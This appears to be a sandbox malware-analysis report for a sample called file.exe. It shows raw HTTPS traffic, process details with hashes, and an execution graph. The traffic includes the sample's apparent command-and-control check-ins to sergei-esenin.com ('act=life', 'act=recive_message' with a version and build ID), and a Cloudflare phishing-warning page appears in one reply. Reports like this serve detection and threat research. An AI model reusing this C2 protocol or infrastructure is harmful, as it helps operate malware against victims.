                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                        2024-10-13 19:40:07 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                        Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                        2024-10-13 19:40:07 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                        Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                                                        2024-10-13 19:40:07 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.549705104.21.53.84435256C:\Users\user\Desktop\file.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-13 19:40:08 UTC264OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 8
                                                                                                        Host: sergei-esenin.com
                                                                                                        2024-10-13 19:40:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                        Data Ascii: act=life
                                                                                                        2024-10-13 19:40:08 UTC557INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 13 Oct 2024 19:40:08 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FyJM5aNS3Y9FX1BRBeREI5vmWWO7IOKij9pgpSoKTL8joue4A%2BsKsMp5K0xJAuxsi4hRiCpLndje3uK9TMXTn1M8IUkUuSeQRE4to%2ByQc7Ayy8aTwxvTUbVTHbf3Wh%2FEpY%2FXoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d21ccb94f0d1a13-EWR
                                                                                                        2024-10-13 19:40:08 UTC812INData Raw: 31 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                        Data Ascii: 1151<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                        2024-10-13 19:40:08 UTC1369INData Raw: 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64
                                                                                                        Data Ascii: tyles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById
                                                                                                        2024-10-13 19:40:08 UTC1369INData Raw: 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: anagement/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
                                                                                                        2024-10-13 19:40:08 UTC891INData Raw: 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d
                                                                                                        Data Ascii: > <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id=
                                                                                                        2024-10-13 19:40:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.549706104.21.53.84435256C:\Users\user\Desktop\file.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-10-13 19:40:09 UTC354OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Cookie: __cf_mw_byp=0kIDZS1AddzvbqcMuXqu5mPsh5phixIkLU9lDK.HpZc-1728848408-0.0.1.1-/api
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 52
                                                                                                        Host: sergei-esenin.com
                                                                                                        2024-10-13 19:40:09 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                        2024-10-13 19:40:09 UTC831INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 13 Oct 2024 19:40:09 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=amnnqmrr3mh3gq5d4900gb9v0g; expires=Thu, 06 Feb 2025 13:26:48 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kLB58NlU0RsH0iGWzhRuaWrlJ%2FFyQ7SOTeEqkUsPlsO%2F37rjkcF2VZrXZZpJm%2F8fsIMJ8an81Lm3XwfF5gq5e8LZXg7aktkhj21JGg%2BflG%2FkbBeXslteuSgdZQ0yYIvxPHNQMQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8d21ccbdab8b8c29-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-10-13 19:40:09 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                        Data Ascii: aerror #D12
                                                                                                        2024-10-13 19:40:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Click to jump to process

                                                                                                        Click to jump to process

                                                                                                        Click to dive into process behavior distribution

                                                                                                        Click to jump to process

                                                                                                        Target ID:0
                                                                                                        Start time:15:40:03
                                                                                                        Start date:13/10/2024
                                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                        Imagebase:0x190000
                                                                                                        File size:2'960'896 bytes
                                                                                                        MD5 hash:721993AC48789FDB695EF35383B11C82
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low
                                                                                                        Has exited:true

                                                                                                        Target ID:4
                                                                                                        Start time:15:40:08
                                                                                                        Start date:13/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1924
                                                                                                        Imagebase:0x890000
                                                                                                        File size:483'680 bytes
                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:15:40:29
                                                                                                        Start date:13/10/2024
                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5256 -s 1060
                                                                                                        Imagebase:0x890000
                                                                                                        File size:483'680 bytes
                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:2.7%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:35.9%
                                                                                                          Total number of Nodes:223
                                                                                                          Total number of Limit Nodes:17
                                                                                                          execution_graph 7723 1a049b 7727 1a0227 7723->7727 7725 1d5700 2 API calls 7728 1a0308 7725->7728 7726 1a0455 7726->7725 7727->7726 7727->7728 7729 1d5700 7727->7729 7730 1d571b 7729->7730 7731 1d5797 7729->7731 7733 1d578c 7729->7733 7735 1d5729 7729->7735 7730->7731 7730->7733 7730->7735 7736 1d3220 7731->7736 7733->7726 7734 1d5776 RtlReAllocateHeap 7734->7733 7735->7734 7737 1d32ac 7736->7737 7738 1d32a2 RtlFreeHeap 7736->7738 7739 1d3236 7736->7739 7737->7733 7738->7737 7739->7738 7832 19f058 7833 19f06d 7832->7833 7836 19fca0 7833->7836 7839 19fcdc 7836->7839 7837 19f0f9 7838 1d3220 RtlFreeHeap 7838->7837 7839->7837 7839->7838 7884 1a811b 7889 1d9b60 7884->7889 7886 1a81ea 7888 1a814a 7888->7886 7895 1d5bb0 LdrInitializeThunk 7888->7895 7892 1d9b85 7889->7892 7890 1d9bef 7891 1d9c9e 7890->7891 7897 1d5bb0 LdrInitializeThunk 7890->7897 7891->7888 7892->7890 7896 1d5bb0 LdrInitializeThunk 7892->7896 7895->7888 7896->7890 7897->7891 7898 1a111d 7899 1d5700 2 API calls 7898->7899 7900 1a1127 7899->7900 7740 19d110 7744 19d119 7740->7744 7741 19d2ee 7742 19d2e9 7749 1d56e0 7742->7749 7744->7741 7744->7742 7748 1a2f10 CoInitialize 7744->7748 7752 1d7180 7749->7752 7751 1d56e5 FreeLibrary 7751->7741 7753 1d7189 7752->7753 7753->7751 8007 1a6f91 8009 1a6fbc 8007->8009 8008 1a702a 8014 1d5bb0 LdrInitializeThunk 8008->8014 8009->8008 8013 1d5bb0 LdrInitializeThunk 8009->8013 8012 1a70d1 8013->8008 8014->8012 7759 1d99d0 7760 1d99f5 7759->7760 7763 1d9a5f 7760->7763 7765 1d5bb0 LdrInitializeThunk 7760->7765 7761 1d9b0e 7763->7761 7766 1d5bb0 LdrInitializeThunk 7763->7766 7765->7763 7766->7761 7840 1ad457 7841 1d95b0 LdrInitializeThunk 7840->7841 7842 1ad46b 7841->7842 7843 1ad4a9 7842->7843 7845 1ad47a 7842->7845 7846 1ad4d6 7842->7846 7850 1d98f0 7842->7850 7843->7845 7843->7846 7854 1d99d0 7843->7854 7846->7845 7860 1d5bb0 LdrInitializeThunk 7846->7860 7849 1ad6db 7852 1d9918 7850->7852 7851 1d997e 7851->7843 7852->7851 7861 1d5bb0 LdrInitializeThunk 7852->7861 7855 1d99f5 7854->7855 7858 1d9a5f 7855->7858 7862 1d5bb0 LdrInitializeThunk 7855->7862 7856 1d9b0e 7856->7846 7858->7856 7863 1d5bb0 LdrInitializeThunk 7858->7863 7860->7849 7861->7851 7862->7858 7863->7856 8023 19efd4 8024 1d3220 RtlFreeHeap 8023->8024 8025 19efdf 8024->8025 7974 1ae30b 7975 1ae320 7974->7975 7978 1ae34e 7974->7978 7976 1d3e30 LdrInitializeThunk 7975->7976 7976->7978 7977 1d3220 RtlFreeHeap 7979 1ae5a2 7977->7979 7980 1d3e30 LdrInitializeThunk 7978->7980 7986 1ae560 7978->7986 7983 1ae41c 7980->7983 7981 1d3e30 LdrInitializeThunk 7981->7983 7982 1d3220 RtlFreeHeap 7982->7983 7983->7981 7983->7982 7984 1ae56a 7983->7984 7983->7986 7985 1d3220 RtlFreeHeap 7984->7985 7985->7986 7986->7977 7824 1a9809 7827 1d9410 7824->7827 7826 1a9848 7828 1d9430 7827->7828 7828->7828 7829 1d954e 7828->7829 7831 1d5bb0 LdrInitializeThunk 7828->7831 7829->7826 7831->7829 8026 1a83ce 8028 1a8403 8026->8028 8027 1a846d 8028->8027 8030 1d5bb0 LdrInitializeThunk 8028->8030 8030->8028 7934 1a8e0d 7936 1a8e42 7934->7936 7939 1a8ea4 7936->7939 7940 1d5bb0 LdrInitializeThunk 7936->7940 7937 1a8fa3 7939->7937 7941 1d5bb0 LdrInitializeThunk 7939->7941 7940->7936 7941->7939 7948 1d4a40 7951 1d4a77 7948->7951 7949 1d4ad8 7953 1d4b6d 7949->7953 7957 1d3e30 7949->7957 7951->7949 7956 1d5bb0 LdrInitializeThunk 7951->7956 7954 1d4b29 7954->7953 7961 1d5bb0 LdrInitializeThunk 7954->7961 7956->7949 7958 1d3e45 7957->7958 7959 1d3ed0 7958->7959 7962 1d5bb0 LdrInitializeThunk 7958->7962 7959->7954 7961->7953 7962->7959 7872 1a7c84 7873 1a7c89 7872->7873 7874 1d3220 RtlFreeHeap 7873->7874 7875 1a7c96 7874->7875 7963 1a6ebf 7967 1a6a52 7963->7967 7965 1d3220 RtlFreeHeap 7965->7967 7967->7963 7967->7965 7968 1d3630 7967->7968 7972 1d5bb0 LdrInitializeThunk 7967->7972 7969 1d36be 7968->7969 7970 1d3640 7968->7970 7969->7967 7970->7969 7973 1d5bb0 LdrInitializeThunk 7970->7973 7972->7967 7973->7969 7901 1ad93c 7902 1d98f0 LdrInitializeThunk 7901->7902 7903 1ad952 7902->7903 7996 1a4b3c 7997 1a4b40 7996->7997 7998 1b42b0 LdrInitializeThunk 7997->7998 7999 1a5a97 7997->7999 7998->7999 7904 1a6536 7907 1a655c 7904->7907 7906 1a68a4 7906->7906 7908 1d32c0 7907->7908 7910 1d32f0 7908->7910 7909 1d3492 7909->7906 7913 1d333e 7910->7913 7916 1d5bb0 LdrInitializeThunk 7910->7916 7912 1d3220 RtlFreeHeap 7912->7909 7913->7909 7914 1d33fe 7913->7914 7917 1d5bb0 LdrInitializeThunk 7913->7917 7914->7912 7916->7913 7917->7914 7930 19edb5 7931 19edd0 7930->7931 7931->7931 7932 19fca0 RtlFreeHeap 7931->7932 7933 19ef70 7932->7933 7754 1d95b0 7756 1d95d0 7754->7756 7755 1d970e 7756->7755 7758 1d5bb0 LdrInitializeThunk 7756->7758 7758->7755 7876 1a68ab 7877 1a68aa 7876->7877 7877->7876 7879 1d34d0 7877->7879 7880 1d359e 7879->7880 7881 1d34e1 7879->7881 7880->7877 7881->7880 7883 1d5bb0 LdrInitializeThunk 7881->7883 7883->7880 7942 1a0228 7943 1a0455 7942->7943 7944 1a0242 7942->7944 7945 1a0308 7942->7945 7947 1d5700 2 API calls 7943->7947 7944->7943 7944->7945 7946 1d5700 2 API calls 7944->7946 7946->7943 7947->7945 8034 1aefee 8037 1d5bb0 LdrInitializeThunk 8034->8037 8036 1af007 8037->8036 7767 1a2f6f CoInitializeSecurity 8038 1a3be2 8039 1a3be9 8038->8039 8040 1a3ea3 8039->8040 8043 1a3e36 8039->8043 8044 1d5bb0 LdrInitializeThunk 8039->8044 8040->8043 8045 1d5bb0 LdrInitializeThunk 8040->8045 8044->8040 8045->8043 7768 19fca0 7771 19fcdc 7768->7771 7769 19ffe4 7770 1d3220 RtlFreeHeap 7770->7769 7771->7769 7771->7770 7772 1a2fe0 7774 1a2ffa 7772->7774 7773 1a3377 7774->7772 7774->7773 7775 1d3220 RtlFreeHeap 7774->7775 7776 1a34cc 7774->7776 7775->7774 7793 1b9510 7776->7793 7778 1a3674 7801 1b9bb0 7778->7801 7794 1b956e 7793->7794 7794->7794 7805 1d9760 7794->7805 7797 1b98f7 7798 1b9908 7797->7798 7809 1b6cc0 7797->7809 7798->7778 7799 1b9768 7799->7797 7799->7798 7799->7799 7800 1d9760 LdrInitializeThunk 7799->7800 7800->7797 7802 1b9c51 7801->7802 7818 1b42b0 7802->7818 7804 1b9e05 7806 1d9780 7805->7806 7807 1d989e 7806->7807 7812 1d5bb0 LdrInitializeThunk 7806->7812 7807->7799 7813 1d95b0 7809->7813 7811 1b6d15 7812->7807 7815 1d95d0 7813->7815 7814 1d970e 7814->7811 7815->7814 7817 1d5bb0 LdrInitializeThunk 7815->7817 7817->7814 7819 1b42c0 7818->7819 7820 1d9760 LdrInitializeThunk 7819->7820 7823 1b4319 7820->7823 7821 1b43d7 7821->7804 7822 1b6cc0 LdrInitializeThunk 7822->7821 7823->7821 7823->7822 8000 1ad760 8001 1ad773 8000->8001 8001->8001 8002 1d95b0 LdrInitializeThunk 8001->8002 8003 1ad92d 8002->8003 7926 1ad961 7927 1ad96e 7926->7927 7928 1d99d0 LdrInitializeThunk 7927->7928 7929 1ad983 7928->7929 7929->7929 7918 1d3920 7919 1d393c 7918->7919 7920 1d3a42 7919->7920 7922 1d5bb0 LdrInitializeThunk 7919->7922 7922->7920

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 236 19fca0-19fcda 237 19fd0b-19fe22 236->237 238 19fcdc-19fcdf 236->238 240 19fe5b-19fe8c 237->240 241 19fe24 237->241 239 19fce0-19fd09 call 1a2690 238->239 239->237 244 19fe8e-19fe8f 240->244 245 19feb6-19fec5 call 1a0b50 240->245 243 19fe30-19fe59 call 1a2760 241->243 243->240 249 19fe90-19feb4 call 1a2700 244->249 250 19feca-19fecf 245->250 249->245 253 19fed5-19fef8 250->253 254 19ffe4-19ffe6 250->254 256 19ff2b-19ff2d 253->256 257 19fefa 253->257 258 1a01b1-1a01bb 254->258 260 19ff30-19ff3a 256->260 259 19ff00-19ff29 call 1a27e0 257->259 259->256 262 19ff3c-19ff3f 260->262 263 19ff41-19ff49 260->263 262->260 262->263 265 19ff4f-19ff76 263->265 266 1a01a2-1a01ad call 1d3220 263->266 268 19ff78 265->268 269 19ffab-19ffb5 265->269 266->258 273 19ff80-19ffa9 call 1a2840 268->273 270 19ffeb 269->270 271 19ffb7-19ffbb 269->271 275 19ffed-19ffef 270->275 274 19ffc7-19ffcb 271->274 273->269 278 1a019a 274->278 279 19ffd1-19ffd8 274->279 275->278 280 19fff5-1a002c 275->280 278->266 281 19ffda-19ffdc 279->281 282 19ffde 279->282 283 1a005b-1a0065 280->283 284 1a002e-1a002f 280->284 281->282 287 19ffc0-19ffc5 282->287 288 19ffe0-19ffe2 282->288 285 1a0067-1a006f 283->285 286 1a00a4 283->286 289 1a0030-1a0059 call 1a28a0 284->289 290 1a0087-1a008b 285->290 291 1a00a6-1a00a8 286->291 287->274 287->275 288->287 289->283 290->278 294 1a0091-1a0098 290->294 291->278 295 1a00ae-1a00c5 291->295 296 1a009a-1a009c 294->296 297 1a009e 294->297 298 1a00fb-1a0102 295->298 299 1a00c7 295->299 296->297 302 1a0080-1a0085 297->302 303 1a00a0-1a00a2 297->303 300 1a0130-1a013c 298->300 301 1a0104-1a010d 298->301 304 1a00d0-1a00f9 call 1a2900 299->304 306 1a01c2-1a01c7 300->306 305 1a0117-1a011b 301->305 302->290 302->291 303->302 304->298 305->278 308 1a011d-1a0124 305->308 306->266 310 1a012a 308->310 311 1a0126-1a0128 308->311 312 1a012c-1a012e 310->312 313 1a0110-1a0115 310->313 311->310 312->313 313->305 314 1a0141-1a0143 313->314 314->278 315 1a0145-1a015b 314->315 315->306 316 1a015d-1a015f 315->316 317 1a0163-1a0166 316->317 318 1a0168-1a0188 call 1a2030 317->318 319 1a01bc 317->319 322 1a018a-1a0190 318->322 323 1a0192-1a0198 318->323 319->306 322->317 322->323 323->306
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
